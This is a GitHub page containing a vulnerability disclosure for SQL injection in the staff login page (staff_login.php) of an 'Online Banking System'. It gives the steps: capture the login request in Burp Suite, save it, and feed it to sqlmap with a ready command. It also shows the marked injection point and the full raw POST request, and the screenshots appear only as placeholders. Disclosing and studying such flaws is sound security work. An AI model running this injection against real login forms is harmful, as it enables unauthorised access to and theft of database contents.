Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Online Banking System SQL Injection

  • Description => sql injection at staff_login.php

Step to Reproduct

  • Staff Login -> Staff ID -> Staff Password -> Login -> modify data -> Sqlmap

Exploit

  • Input Staff ID and Staff Password -> Login image
  • Use Burp Suite capture request image
  • Then modify the data and save as sqli.txt image
  • Scan sqli.txt on Sqlmap
python3 sqlmap.py -r sqli.txt --batch --current-user

image

Vulnerable Code

image

  • No filter Staff ID and Staff Password when inserting data to database

Information Disclosure

image

POC

Injection Point

staff_id=*&password=hhhhhhhhhh&staff_login-btn=LOGIN
  • Request
POST /Online-Banking/staff_login.php HTTP/1.1
Host: 192.168.1.101:8080
Content-Length: 57
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.101:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.101:8080/Online-Banking/staff_login.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=jpkpok9b1tiholm7srir1b6mev
Connection: close

staff_id=*&password=hhhhhhhhhh&staff_login-btn=LOGIN